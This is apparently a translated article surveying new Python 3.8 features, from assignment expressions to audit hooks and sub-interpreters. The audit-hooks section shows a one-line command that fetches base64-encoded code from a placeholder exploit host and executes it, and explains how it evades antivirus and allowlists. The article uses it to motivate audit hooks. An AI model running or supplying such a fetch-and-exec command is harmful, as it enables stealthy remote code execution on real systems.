Python 3.8: What's New and How to Use It?

This translation was prepared for Pythonistas who want a reliable overview of the new features in Python 3.8. With a new cohort of the "Python Developer" course about to start, we could not pass this topic by.

In this article, we'll talk about the new features that were introduced in Python 3.8.




Walrus operator (assignment expressions)


We know you have been waiting for this. The wait goes back to the days when Python deliberately forbade the use of "=" inside expressions. Some people liked this, because they could no longer confuse = and == when assigning and comparing. Others found it inconvenient to either repeat an expression or assign it to a variable first. Let's move on to an example.

According to Guido, most programmers tend to write:

    group = re.match(pattern, data).group(1) if re.match(pattern, data) else None

instead of:

    match = re.match(pattern, data)
    group = match.group(1) if match else None

The first form makes the program slower, because the match is performed twice. Still, it is understandable why some programmers avoid the second form: the extra line clutters the code.

Now we can write:

    group = match.group(1) if (match := re.match(pattern, data)) else None
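A runnable version of the same idea might look like the sketch below. The pattern, the sample strings, and the helper name first_group are made up for illustration and are not part of Guido's example.

```python
import re

# Hypothetical pattern for illustration: capture the digits after "id=".
PATTERN = re.compile(r"id=(\d+)")


def first_group(data):
    """Return the first captured group, or None when there is no match."""
    # The match object is bound and tested in a single expression,
    # so the regex runs only once.
    return match.group(1) if (match := PATTERN.search(data)) else None


print(first_group("user id=42"))   # 42
print(first_group("no id here"))   # None
```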

It is also useful in if/elif chains, where it avoids computing everything up front. Before, we had to write:

    match1 = pattern1.match(data)
    match2 = pattern2.match(data)
    if match1:
        result = match1.group(1)
    elif match2:
        result = match2.group(2)
    else:
        result = None

And instead, we can write:

    if (match1 := pattern1.match(data)):
        result = match1.group(1)
    elif (match2 := pattern2.match(data)):
        result = match2.group(2)
    else:
        result = None

This is more efficient, since the second match is never evaluated if the first one succeeds.
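To make the lazy evaluation visible, here is a small sketch that records which patterns were actually tried. The helper try_match, the patterns, and the sample string are assumptions made up for this illustration.

```python
import re

calls = []  # records which patterns were actually tried


def try_match(name, pattern, data):
    """Hypothetical helper: run a regex match and remember that it ran."""
    calls.append(name)
    return re.match(pattern, data)


data = "abc-123"

if (match1 := try_match("pattern1", r"([a-z]+)-", data)):
    result = match1.group(1)
elif (match2 := try_match("pattern2", r"[a-z]+-(\d+)", data)):
    result = match2.group(1)
else:
    result = None

print(result)  # abc
print(calls)   # ['pattern1']: pattern2 was never evaluated
```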

In fact, I am very pleased with PEP 572, because it not only provides something that was not possible before, but also uses a separate operator for it, so it is hard to confuse with ==.

At the same time, it opens up new opportunities for mistakes and for writing code that was previously invalid:

 y0 = (y1 := f(x)) 
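One mistake of this kind (an example chosen here, not taken from the original article) involves operator precedence: := binds more loosely than comparison operators, so forgetting the parentheses silently changes what gets assigned. A minimal sketch with made-up variable names:

```python
values = [1, 2, 3, 4, 5]

# Without parentheses, := binds more loosely than the comparison,
# so the name receives the result of the comparison (a bool).
if n := len(values) > 3:
    unparenthesized = n

# With parentheses, the name receives the length itself.
if (m := len(values)) > 3:
    parenthesized = m

print(unparenthesized)  # True
print(parenthesized)    # 5
```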

Positional-only arguments


    def f(a, b, /, c, d, *, e, f):
        print(a, b, c, d, e, f)

Here, everything before / is positional-only, and everything after * is keyword-only.

    f(10, 20, 30, d=40, e=50, f=60)        # valid
    f(10, b=20, c=30, d=40, e=50, f=60)    # invalid: b cannot be a keyword argument
    f(10, 20, 30, 40, 50, f=60)            # invalid: e must be a keyword argument
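The three calls can be checked with a short script. The wrapper describe_call is a hypothetical helper added only so that the failing calls do not stop the script, and f returns its arguments instead of printing them.

```python
def f(a, b, /, c, d, *, e, f):
    return (a, b, c, d, e, f)


def describe_call(*args, **kwargs):
    """Hypothetical helper: return the result or the TypeError message."""
    try:
        return f(*args, **kwargs)
    except TypeError as exc:
        return f"TypeError: {exc}"


valid = describe_call(10, 20, 30, d=40, e=50, f=60)
keyword_b = describe_call(10, b=20, c=30, d=40, e=50, f=60)
positional_e = describe_call(10, 20, 30, 40, 50, f=60)

print(valid)         # (10, 20, 30, 40, 50, 60)
print(keyword_b)     # a TypeError message: b was passed by keyword
print(positional_e)  # a TypeError message: too many positional arguments
```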

The use case for this feature can be summed up in one sentence: it will be easier for libraries to change their signatures. Let's look at an example:

 def add_to_queue(item: QueueItem): 

The author now has to support this signature, and the parameter name can no longer be changed, because renaming it would break every caller that passes item= by keyword. Imagine that you later need to accept not just one element but a whole list of elements:

 def add_to_queue(items: Union[QueueItem, List[QueueItem]]): 

Or so:

 def add_to_queue(*items: QueueItem): 

This is something you could not do before without risking incompatibility with the previous version. With positional-only parameters, you can. It is also more consistent with existing designs that already behave this way. For example, before Python 3.8 the built-in pow function did not accept keyword arguments:
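The signature change described above can be sketched as follows. This is an illustration only: plain strings stand in for QueueItem, and the module-level queue list is a made-up stand-in for the library's internal state.

```python
from typing import List

queue: List[str] = []


# Version 1 of a hypothetical library: the parameter is positional-only.
def add_to_queue(item, /):
    queue.append(item)


add_to_queue("first")  # callers can only pass the value by position


# Version 2: the parameter is renamed and now accepts several items.
# Existing positional calls keep working, because nobody could have
# written add_to_queue(item=...) against version 1.
def add_to_queue(*items):
    queue.extend(items)


add_to_queue("second")
add_to_queue("third", "fourth")
print(queue)  # ['first', 'second', 'third', 'fourth']
```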

    >>> help(pow)
    ...
    pow(x, y, z=None, /)
    ...
    >>> pow(x=5, y=3)
    Traceback (most recent call last):
      File "<stdin>", line 1, in <module>
    TypeError: pow() takes no keyword arguments

Debugging with f-strings


A small addition that gives us a compact notation of the form "expression = value".

 f"{chr(65) = }" => "chr(65) = 'A'" 

Did you notice the = after chr(65)? That is the whole trick. It gives us a shorter way to print variables using f-strings.
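A few more variations, as a quick sketch with made-up variable names. By default the value is shown with repr(); a conversion such as !s or a format specification can follow the = sign.

```python
user = "guido"
ratio = 2 / 3

debug_default = f"{user = }"        # repr() is used by default
debug_str = f"{user = !s}"          # force str() instead
debug_format = f"{ratio = :.2f}"    # a format spec applies to the value
debug_expr = f"{len(user) + 1 = }"  # any expression works, not just names

print(debug_default)  # user = 'guido'
print(debug_str)      # user = guido
print(debug_format)   # ratio = 0.67
print(debug_expr)     # len(user) + 1 = 6
```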

Native asyncio shell


Now, if we start the Python shell with 'python -m asyncio', we no longer need asyncio.run() to run asynchronous functions; await can be used directly in the shell:

    > python -m asyncio
    asyncio REPL 3.8.0b4
    Use "await" directly instead of "asyncio.run()".
    Type "help", "copyright", "credits" or "license" for more information.
    >>> import asyncio
    >>> async def test():
    ...     await asyncio.sleep(1)
    ...     return 'hello'
    ...
    >>> await test()
    'hello'
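For comparison, outside the asyncio REPL the same coroutine still has to be driven through asyncio.run(). A minimal script version, with the sleep shortened for the example, might look like this:

```python
import asyncio


async def test():
    await asyncio.sleep(0.1)  # shortened delay for the example
    return 'hello'


# In a regular script there is no running event loop,
# so we start one explicitly with asyncio.run().
result = asyncio.run(test())
print(result)  # hello
```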

Python runtime audit hooks


The Python runtime relies heavily on C. However, code executed in it is not logged or tracked in any way. This makes it difficult for testing frameworks, logging frameworks, and security tools to monitor, and possibly limit, the actions taken by the runtime.

Now you can observe the events triggered by the runtime, including the operation of the module import system and any user hooks.

The new API is as follows:

    # Add an auditing hook
    sys.addaudithook(hook: Callable[[str, tuple]])

    # Raise an event with all auditing hooks
    sys.audit(str, *args)

Hooks cannot be deleted or replaced. For CPython, hooks coming from C are considered global, while hooks coming from Python are only for the current interpreter. Global hooks are executed before the interpreter hooks.

One particularly interesting exploit that would otherwise go untracked might look like this:

    python -c "import urllib.request, base64;
        exec(base64.b64decode(
            urllib.request.urlopen('http://my-exploit/py.b64')
        ).decode())"

This code is not caught by most anti-virus programs, since they focus on recognizable code being read over the network or written to disk, and base64 is enough to get around such checks. It also gets past protections such as file access control lists or permissions (no file access is needed), trusted application lists (assuming that Python has already been approved), and automatic auditing or logging (assuming that Python is allowed to access the Internet or another machine on the local network from which the payload can be fetched).

With runtime event hooks, we can decide how to respond to any particular event. We can either log the event or abort the operation entirely.
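Both responses, logging and aborting, can be sketched in a few lines. The event names demo.allowed and demo.forbidden are invented for this illustration; real events raised by the runtime have other names. Since a hook cannot be removed once added, this one deliberately ignores every event it does not recognize.

```python
import sys

seen_events = []


def audit_hook(event, args):
    """Log our demo events and veto one of them; ignore everything else."""
    if event == "demo.allowed":
        seen_events.append((event, args))
    elif event == "demo.forbidden":
        seen_events.append((event, args))
        # Raising from a hook aborts the operation that raised the event.
        raise PermissionError(f"blocked audit event: {event}")


# Hooks cannot be removed once added, so the hook must stay cheap and safe.
sys.addaudithook(audit_hook)

sys.audit("demo.allowed", "some", "payload")

try:
    sys.audit("demo.forbidden", 42)
except PermissionError as exc:
    blocked_message = str(exc)

print(seen_events)
print(blocked_message)  # blocked audit event: demo.forbidden
```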

multiprocessing.shared_memory


This module lets different processes or interpreters use the same region of memory. In practice, it can reduce the time spent serializing objects in order to pass them between processes. Instead of serializing, queuing, and deserializing, a process can simply read the shared memory written by another process.
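A minimal sketch of the API follows. To keep it self-contained, both handles live in the same process; the second handle stands in for what another process would do after being given the block's name. The variable names producer and consumer are made up for the example.

```python
from multiprocessing import shared_memory

# "Producer" side: create a named block and write raw bytes into it.
producer = shared_memory.SharedMemory(create=True, size=16)
producer.buf[:5] = b"hello"

# "Consumer" side: attach to the same block by name. In a real program
# this would run in a different process that was given the name.
consumer = shared_memory.SharedMemory(name=producer.name)
received = bytes(consumer.buf[:5])
print(received)  # b'hello'

# Every handle is closed; the block itself is unlinked exactly once.
consumer.close()
producer.close()
producer.unlink()
```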

Pickle Protocol and Out-of-Band Data Buffers


Pickle protocol 5 adds support for out-of-band buffers, where data can be transmitted separately from the main pickle stream at the discretion of the transport layer.
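As a rough sketch of what this means in practice, the example below pickles the same message twice: once in-band and once with the large buffer handed to a callback. The message layout and the names are assumptions for illustration; here the "transport" is just a Python list passed from dumps to loads.

```python
import pickle

# A large, writable payload wrapped so pickle may ship it out of band.
payload = bytearray(b"x" * 1_000_000)
message = {"name": "frame-1", "pixels": pickle.PickleBuffer(payload)}

# In-band: the payload bytes are copied into the pickle stream.
in_band = pickle.dumps(message, protocol=5)

# Out-of-band: the callback collects the buffers, the stream stays small.
buffers = []
out_of_band = pickle.dumps(message, protocol=5, buffer_callback=buffers.append)

# The receiver supplies the buffers in the order they were collected.
restored = pickle.loads(out_of_band, buffers=buffers)

print(len(in_band) > 1_000_000)   # True
print(len(out_of_band) < 1_000)   # True
print(bytes(memoryview(restored["pixels"])) == bytes(payload))  # True
```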

Both of these additions did ship in Python 3.8. They matter even more in light of another feature that did not make it into the release, because work remains on compatibility with old code, but that could change the approach to parallel programming in Python.

Sub-interpreters


Threads in Python cannot run in parallel because of the GIL, while processes require a lot of resources. Just starting a process takes 100-200 ms, and processes also consume a large amount of RAM. Sub-interpreters are meant to address both problems. The plan is for each interpreter to have its own GIL, so that one interpreter does not hold up the others, and a sub-interpreter is cheaper to start than a process (albeit slower than a thread).

The main problem that arises here is passing data between interpreters, since they cannot share state the way threads do. We therefore need some kind of channel between them. Pickle, marshal, or json can be used to serialize and deserialize objects, but this approach is rather slow. One solution is to use shared memory from the multiprocessing module.

Sub-interpreters look like a good solution to the GIL problem, but a fair amount of work remains. In some places, Python still uses "Runtime State" instead of "Interpreter State". The garbage collector, for example, does just that. Many internal modules therefore need to be changed before sub-interpreters can be used properly.

I hope this functionality can be fully deployed already in Python version 3.9.

In conclusion, this version adds some syntactic sugar as well as some serious improvements to the libraries and to the runtime. However, several interesting features did not make it into the release, so we will wait for them in Python 3.9.

Source: https://habr.com/ru/post/472432/
